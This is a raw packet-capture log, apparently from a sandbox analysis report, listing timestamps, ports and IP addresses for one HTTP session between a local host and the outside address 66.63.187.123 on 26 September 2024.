Sep 26, 2024 09:19:22.340115070 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340118885 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340151072 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340156078 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340186119 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340193987 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340224981 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340228081 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340265989 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340854883 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340889931 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340914011 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340934992 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.340934992 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340971947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.340976954 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341006994 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341022968 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341042042 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341049910 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341080904 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341098070 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341125965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341353893 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341387987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341407061 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341423035 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341432095 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341458082 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341466904 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341492891 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341500998 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341540098 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.341541052 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.341588020 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701376915 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701440096 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701468945 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701498032 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701499939 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701534986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701545000 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701570988 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701580048 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701606035 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701616049 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701651096 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701659918 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701709986 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701714039 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701749086 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701757908 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701781988 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701791048 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701814890 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701823950 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701847076 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701850891 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701867104 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701885939 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701891899 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701920986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701936960 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701956987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701967001 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.701992035 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.701999903 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702029943 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702035904 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702068090 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702080965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702111959 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702455997 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702490091 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702510118 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702523947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702533960 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702558041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702567101 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702591896 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702604055 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702625036 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702637911 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702658892 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702675104 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702692032 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702702045 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702728987 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702734947 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702764988 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.702770948 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702812910 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.702967882 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703022003 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703023911 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703058004 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703078985 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703090906 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703100920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703125000 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703133106 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703159094 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703172922 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703193903 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703201056 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703227997 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703236103 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703262091 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703274965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703295946 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703313112 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703332901 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703339100 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703366995 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703370094 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703412056 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703439951 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703474045 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703493118 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703506947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703516006 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703541040 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703547001 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703577995 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703586102 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703612089 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703623056 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703646898 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703660965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703680992 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703690052 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703716993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703723907 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703752995 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.703768015 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.703800917 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.704782009 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.704838037 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.704844952 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.704875946 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.704884052 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.704911947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.704924107 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.704946995 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.704955101 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.704986095 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.705001116 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.705035925 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:22.705506086 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:22.705558062 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051680088 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051769972 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051809072 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051846027 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051881075 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051897049 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051897049 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051897049 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051897049 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051915884 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051934958 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051953077 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051961899 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.051986933 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.051995993 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052026033 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052031994 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052069902 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052150965 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052194118 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052208900 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052248955 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052252054 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052284956 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052294970 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052320957 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052326918 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052354097 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052361965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052397966 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052423000 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052457094 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052465916 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052493095 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052508116 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052531958 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052637100 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052676916 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.052681923 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052726030 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.052970886 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053016901 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053029060 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053064108 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053072929 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053097963 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053108931 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053132057 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053132057 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053167105 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053174973 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053201914 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053210974 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053236961 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053245068 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053273916 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053278923 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053318024 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053709030 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053744078 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053752899 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053780079 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053798914 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053814888 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053821087 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053858042 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053872108 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053904057 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053913116 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053950071 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.053961039 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.053993940 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054003954 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054029942 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054063082 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054039001 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054075003 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054107904 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054116011 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054161072 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054168940 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054203033 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054212093 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054236889 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054245949 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054270983 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054279089 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054306030 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054312944 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054341078 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054348946 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054378986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054383993 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054421902 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054905891 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054944038 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054968119 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.054980993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.054982901 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055020094 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055167913 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055214882 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055222034 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055257082 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055263042 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055291891 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055301905 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055326939 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055336952 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055361986 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055372000 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055412054 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055419922 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055438995 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055454969 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055463076 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055490017 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055500984 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055525064 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055535078 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055562973 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.055581093 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.055608034 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056119919 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056171894 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056174994 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056210995 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056216002 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056243896 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056252003 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056287050 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056298971 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056333065 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056343079 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056368113 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056371927 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056400061 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056401968 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056433916 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056440115 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056468964 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056498051 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056502104 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056513071 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056538105 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056540012 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056577921 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056824923 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056858063 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056871891 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056895971 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056900024 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056956053 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.056963921 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.056999922 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057018042 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057034016 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057048082 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057069063 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057075977 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057102919 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057106018 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057137012 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057142019 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057172060 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057185888 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057205915 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057214975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057241917 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057246923 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057286024 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057548046 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057598114 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057605982 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057641029 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057641983 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057687044 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057696104 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057734013 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057744026 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057769060 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.057776928 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.057802916 CEST	80	49161	66.63.187.123	192.168.2.22
